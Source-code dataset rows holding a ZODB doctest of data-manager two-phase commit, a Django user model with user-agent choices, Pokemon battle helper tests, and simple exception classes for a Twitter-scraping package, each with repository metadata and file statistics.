eggs/ZODB-4.1.0-py2.7.egg/ZODB/tests/test_datamanageradapter.py
|
salayhin/talkofacta
|
8b5a14245dd467bb1fda75423074c4840bd69fb7
|
[
"MIT"
] | 2
|
2020-05-16T08:38:34.000Z
|
2020-10-01T01:32:57.000Z
|
eggs/ZODB-4.1.0-py2.7.egg/ZODB/tests/test_datamanageradapter.py
|
salayhin/talkofacta
|
8b5a14245dd467bb1fda75423074c4840bd69fb7
|
[
"MIT"
] | 1
|
2021-03-25T21:51:01.000Z
|
2021-03-25T21:51:01.000Z
|
eggs/ZODB-4.1.0-py2.7.egg/ZODB/tests/test_datamanageradapter.py
|
salayhin/talkofacta
|
8b5a14245dd467bb1fda75423074c4840bd69fb7
|
[
"MIT"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
import unittest
from doctest import DocTestSuite
from transaction._transaction import DataManagerAdapter
from ZODB.tests.sampledm import DataManager
def test_normal_commit():
"""
So, we have a data manager:
>>> dm = DataManager()
and we do some work that modifies uncommited state:
>>> dm.inc()
>>> dm.state, dm.delta
(0, 1)
Now we'll commit the changes. When the data manager joins a transaction,
the transaction will create an adapter.
>>> dma = DataManagerAdapter(dm)
and register it as a modified object. At commit time, the
transaction will get the "jar" like this:
>>> jar = getattr(dma, '_p_jar', dma)
and, of course, the jar and the adapter will be the same:
>>> jar is dma
True
The transaction will call tpc_begin:
>>> t1 = '1'
>>> jar.tpc_begin(t1)
Then the transaction will call commit on the jar:
>>> jar.commit(t1)
This doesn't actually do anything. :)
>>> dm.state, dm.delta
(0, 1)
The transaction will then call tpc_vote:
>>> jar.tpc_vote(t1)
This prepares the data manager:
>>> dm.state, dm.delta
(1, 1)
>>> dm.prepared
True
Finally, tpc_finish is called:
>>> jar.tpc_finish(t1)
and the data manager finishes the two-phase commit:
>>> dm.state, dm.delta
(1, 0)
>>> dm.prepared
False
"""
def test_abort():
"""
So, we have a data manager:
>>> dm = DataManager()
and we do some work that modifies uncommited state:
>>> dm.inc()
>>> dm.state, dm.delta
(0, 1)
When the data manager joins a transaction,
the transaction will create an adapter.
>>> dma = DataManagerAdapter(dm)
and register it as a modified object.
Now we'll abort the transaction. The transaction will get the
"jar" like this:
>>> jar = getattr(dma, '_p_jar', dma)
and, of course, the jar and the adapter will be the same:
>>> jar is dma
True
Then the transaction will call abort on the jar:
>>> t1 = '1'
>>> jar.abort(t1)
Which aborts the changes in the data manager:
>>> dm.state, dm.delta
(0, 0)
"""
def test_tpc_abort_phase1():
"""
So, we have a data manager:
>>> dm = DataManager()
and we do some work that modifies uncommited state:
>>> dm.inc()
>>> dm.state, dm.delta
(0, 1)
Now we'll commit the changes. When the data manager joins a transaction,
the transaction will create an adapter.
>>> dma = DataManagerAdapter(dm)
and register it as a modified object. At commit time, the
transaction will get the "jar" like this:
>>> jar = getattr(dma, '_p_jar', dma)
and, of course, the jar and the adapter will be the same:
>>> jar is dma
True
The transaction will call tpc_begin:
>>> t1 = '1'
>>> jar.tpc_begin(t1)
Then the transaction will call commit on the jar:
>>> jar.commit(t1)
This doesn't actually do anything. :)
>>> dm.state, dm.delta
(0, 1)
At this point, the transaction decides to abort. It calls tpc_abort:
>>> jar.tpc_abort(t1)
Which causes the state of the data manager to be restored:
>>> dm.state, dm.delta
(0, 0)
"""
def test_tpc_abort_phase2():
"""
So, we have a data manager:
>>> dm = DataManager()
and we do some work that modifies uncommited state:
>>> dm.inc()
>>> dm.state, dm.delta
(0, 1)
Now we'll commit the changes. When the data manager joins a transaction,
the transaction will create an adapter.
>>> dma = DataManagerAdapter(dm)
and register it as a modified object. At commit time, the
transaction will get the "jar" like this:
>>> jar = getattr(dma, '_p_jar', dma)
and, of course, the jar and the adapter will be the same:
>>> jar is dma
True
The transaction will call tpc_begin:
>>> t1 = '1'
>>> jar.tpc_begin(t1)
Then the transaction will call commit on the jar:
>>> jar.commit(t1)
This doesn't actually do anything. :)
>>> dm.state, dm.delta
(0, 1)
The transaction calls vote:
>>> jar.tpc_vote(t1)
This prepares the data manager:
>>> dm.state, dm.delta
(1, 1)
>>> dm.prepared
True
At this point, the transaction decides to abort. It calls tpc_abort:
>>> jar.tpc_abort(t1)
Which causes the state of the data manager to be restored:
>>> dm.state, dm.delta
(0, 0)
>>> dm.prepared
False
"""
def test_suite():
return DocTestSuite()
if __name__ == '__main__':
unittest.main()
| 21.584362
| 78
| 0.612011
| 738
| 5,245
| 4.292683
| 0.192412
| 0.088384
| 0.090909
| 0.057449
| 0.761995
| 0.749053
| 0.734848
| 0.730429
| 0.730429
| 0.730429
| 0
| 0.01386
| 0.257197
| 5,245
| 242
| 79
| 21.673554
| 0.799281
| 0.792564
| 0
| 0
| 0
| 0
| 0.020997
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.416667
| true
| 0
| 0.333333
| 0.083333
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
5c4e3b2c5dfac076531ac69c001a9a3c1a34393d
| 12,146
|
py
|
Python
|
api/accounts/models.py
|
gpiechnik2/senter
|
6f64f5410fe02a5215ba148553dec45feaadcc09
|
[
"CC0-1.0"
] | 2
|
2021-12-08T19:38:33.000Z
|
2022-01-26T15:02:57.000Z
|
api/accounts/models.py
|
gpiechnik2/senter
|
6f64f5410fe02a5215ba148553dec45feaadcc09
|
[
"CC0-1.0"
] | null | null | null |
api/accounts/models.py
|
gpiechnik2/senter
|
6f64f5410fe02a5215ba148553dec45feaadcc09
|
[
"CC0-1.0"
] | 1
|
2021-12-08T19:38:39.000Z
|
2021-12-08T19:38:39.000Z
|
from django.db import models
from django.contrib.auth.models import AbstractUser
from .managers import CustomUserManager
USER_AGENT_CHOICES = (
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"),
("Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"),
("Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"),
("Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1"),
("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko)"),
("Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G36", "Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130"),
("Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"),
("Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"),
("Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"),
("Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"),
("Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"),
("Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0", "Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0"),
("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko)"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"),
("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"),
("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"),
("Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0", "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"),
("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"),
("Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"),
("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"),
("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Firefox 66 Windows Gecko Very common", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Firefox 66 Windows Gecko Very common"),
("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"),
("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"),
("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15"),
("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"),
("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"),
("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"),
("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"),
("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"),
("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"),
("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"),
)
class User(AbstractUser):
username = None
username_validator = None
email = models.EmailField(verbose_name = 'email', max_length = 255, unique = True)
user_agent = models.CharField(max_length = 99999, choices = USER_AGENT_CHOICES, default = USER_AGENT_CHOICES[0][1])
contact_email = models.EmailField(null = True, blank = True)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['first_name']
objects = CustomUserManager()
ACCOUNT_USER_MODEL_USERNAME_FIELD = None
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_UNIQUE_EMAIL = True
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
#ACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = '/?verification=1'
#ACCOUNT_EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL = '/?verification=1'
def get_username(self):
return self.email
def save(self, *args, **kwargs):
if self.contact_email is None:
self.contact_email = self.email
super(User, self).save(*args, **kwargs)
| 138.022727
| 291
| 0.701383
| 2,259
| 12,146
| 3.734838
| 0.083223
| 0.024179
| 0.100273
| 0.125163
| 0.896053
| 0.896053
| 0.896053
| 0.896053
| 0.896053
| 0.896053
| 0
| 0.217597
| 0.129755
| 12,146
| 87
| 292
| 139.609195
| 0.580605
| 0.011856
| 0
| 0
| 0
| 1.246753
| 0.851833
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025974
| false
| 0
| 0.038961
| 0.012987
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5cb3e04837139ea0e6fe5273a6aa1d9efe26c9d8
| 4,803
|
py
|
Python
|
backend/battles/tests/test_helpers.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | null | null | null |
backend/battles/tests/test_helpers.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | 4
|
2021-01-05T18:51:30.000Z
|
2021-04-07T17:03:08.000Z
|
backend/battles/tests/test_helpers.py
|
jaenia/pokebattle
|
760181384ea1c067d40705f120152641156724d8
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from model_mommy import mommy
from battles.helpers import get_battle_result
class BattleHelperTests(TestCase):
def test_creator_wins_battle(self):
creator = mommy.make("users.User", email="creator@test.com")
opponent = mommy.make("users.User", email="opponent@test.com")
# creator's pokemons
pokemon_1 = mommy.make("pokemons.Pokemon", attack=30, defense=30, hit_points=20)
pokemon_2 = mommy.make("pokemons.Pokemon", attack=15, defense=15, hit_points=30)
pokemon_3 = mommy.make("pokemons.Pokemon", attack=20, defense=20, hit_points=40)
# opponent's pokemons
pokemon_4 = mommy.make("pokemons.Pokemon", attack=20, defense=20, hit_points=35)
pokemon_5 = mommy.make("pokemons.Pokemon", attack=10, defense=10, hit_points=30)
pokemon_6 = mommy.make("pokemons.Pokemon", attack=25, defense=25, hit_points=50)
battle = mommy.make(
"battles.Battle",
creator=creator,
opponent=opponent,
creator_pokemon_1=pokemon_1,
creator_pokemon_2=pokemon_2,
creator_pokemon_3=pokemon_3,
opponent_pokemon_1=pokemon_4,
opponent_pokemon_2=pokemon_5,
opponent_pokemon_3=pokemon_6,
)
winner = get_battle_result(battle)
self.assertEqual(winner, battle.creator)
def test_opponent_wins_battle(self):
creator = mommy.make("users.User", email="creator@test.com")
opponent = mommy.make("users.User", email="opponent@test.com")
# creator's pokemons
pokemon_1 = mommy.make("pokemons.Pokemon", attack=10, defense=10, hit_points=20)
pokemon_2 = mommy.make("pokemons.Pokemon", attack=5, defense=5, hit_points=15)
pokemon_3 = mommy.make("pokemons.Pokemon", attack=20, defense=20, hit_points=40)
# opponent's pokemons
pokemon_4 = mommy.make("pokemons.Pokemon", attack=20, defense=20, hit_points=35)
pokemon_5 = mommy.make("pokemons.Pokemon", attack=10, defense=10, hit_points=30)
pokemon_6 = mommy.make("pokemons.Pokemon", attack=25, defense=25, hit_points=50)
battle = mommy.make(
"battles.Battle",
creator=creator,
opponent=opponent,
creator_pokemon_1=pokemon_1,
creator_pokemon_2=pokemon_2,
creator_pokemon_3=pokemon_3,
opponent_pokemon_1=pokemon_4,
opponent_pokemon_2=pokemon_5,
opponent_pokemon_3=pokemon_6,
)
winner = get_battle_result(battle)
self.assertEqual(winner, battle.opponent)
def test_creator_wins_battle_with_draw(self):
creator = mommy.make("users.User", email="creator@test.com")
opponent = mommy.make("users.User", email="opponent@test.com")
# creator's pokemons
pokemon_1 = mommy.make("pokemons.Pokemon", attack=10, defense=10, hit_points=20)
pokemon_2 = mommy.make("pokemons.Pokemon", attack=15, defense=15, hit_points=40)
pokemon_3 = mommy.make(
"pokemons.Pokemon", attack=20, defense=20, hit_points=55
) # higher hit_points
# opponent's pokemons
pokemon_4 = mommy.make("pokemons.Pokemon", attack=10, defense=10, hit_points=35)
pokemon_5 = mommy.make("pokemons.Pokemon", attack=15, defense=15, hit_points=30)
pokemon_6 = mommy.make("pokemons.Pokemon", attack=20, defense=20, hit_points=50)
battle = mommy.make(
"battles.Battle",
creator=creator,
opponent=opponent,
creator_pokemon_1=pokemon_1,
creator_pokemon_2=pokemon_2,
creator_pokemon_3=pokemon_3,
opponent_pokemon_1=pokemon_4,
opponent_pokemon_2=pokemon_5,
opponent_pokemon_3=pokemon_6,
)
winner = get_battle_result(battle)
self.assertEqual(winner, battle.creator)
def test_raises_exception_if_battle_has_not_been_resolved_when_getting_result(self):
creator = mommy.make("users.User", email="creator@test.com")
opponent = mommy.make("users.User", email="opponent@test.com")
# creator's pokemons
pokemon_1 = mommy.make("pokemons.Pokemon", attack=10, defense=10, hit_points=20)
pokemon_2 = mommy.make("pokemons.Pokemon", attack=5, defense=5, hit_points=15)
pokemon_3 = mommy.make("pokemons.Pokemon", attack=20, defense=20, hit_points=40)
battle = mommy.make(
"battles.Battle",
creator=creator,
opponent=opponent,
creator_pokemon_1=pokemon_1,
creator_pokemon_2=pokemon_2,
creator_pokemon_3=pokemon_3,
)
with self.assertRaises(Exception):
get_battle_result(battle)
| 41.051282
| 88
| 0.651051
| 602
| 4,803
| 4.963455
| 0.101329
| 0.099398
| 0.119478
| 0.168675
| 0.904953
| 0.892236
| 0.892236
| 0.892236
| 0.892236
| 0.892236
| 0
| 0.050602
| 0.238809
| 4,803
| 116
| 89
| 41.405172
| 0.766685
| 0.031855
| 0
| 0.727273
| 0
| 0
| 0.130144
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 1
| 0.045455
| false
| 0
| 0.034091
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5cd5a3d4aa4af8a5a4c429cd02ada64aaa61088c
| 505
|
py
|
Python
|
twpy/exceptions/__init__.py
|
0x0ptim0us/twpy
|
ab279566e879834c9287bdf09997f332df57efe8
|
[
"MIT"
] | 56
|
2019-12-15T13:24:31.000Z
|
2022-01-21T17:14:26.000Z
|
twpy/exceptions/__init__.py
|
f4rih/twpy
|
ab279566e879834c9287bdf09997f332df57efe8
|
[
"MIT"
] | 5
|
2020-02-25T22:21:55.000Z
|
2022-01-27T09:06:41.000Z
|
twpy/exceptions/__init__.py
|
f4rih/twpy
|
ab279566e879834c9287bdf09997f332df57efe8
|
[
"MIT"
] | 12
|
2019-12-16T14:39:12.000Z
|
2020-10-12T02:50:57.000Z
|
class IndexError(Exception):
def __init__(self, message):
super().__init__(message)
class ConnectionTimeout(Exception):
def __init__(self, message):
super().__init__(message)
class InvalidValue(Exception):
def __init__(self, message):
super().__init__(message)
class QueryError(Exception):
def __init__(self, message):
super().__init__(message)
class ParameterRequired(Exception):
def __init__(self, message):
super().__init__(message)
| 20.2
| 35
| 0.685149
| 50
| 505
| 6.12
| 0.24
| 0.196078
| 0.261438
| 0.326797
| 0.767974
| 0.767974
| 0.767974
| 0.767974
| 0.627451
| 0
| 0
| 0
| 0.19604
| 505
| 24
| 36
| 21.041667
| 0.753695
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
7a6d5a166ec38f558df8c3fd5b3fb8a2a64cb02b
| 62
|
py
|
Python
|
code/cheat/cheat/cheatsheets/__init__.py
|
cankai/cankai.github.io
|
e09a5b13adc475cb695cae03b5573cb446cca096
|
[
"Apache-2.0"
] | 1
|
2018-11-04T23:59:32.000Z
|
2018-11-04T23:59:32.000Z
|
code/cheat/cheat/cheatsheets/__init__.py
|
cankai/cankai.github.io
|
e09a5b13adc475cb695cae03b5573cb446cca096
|
[
"Apache-2.0"
] | null | null | null |
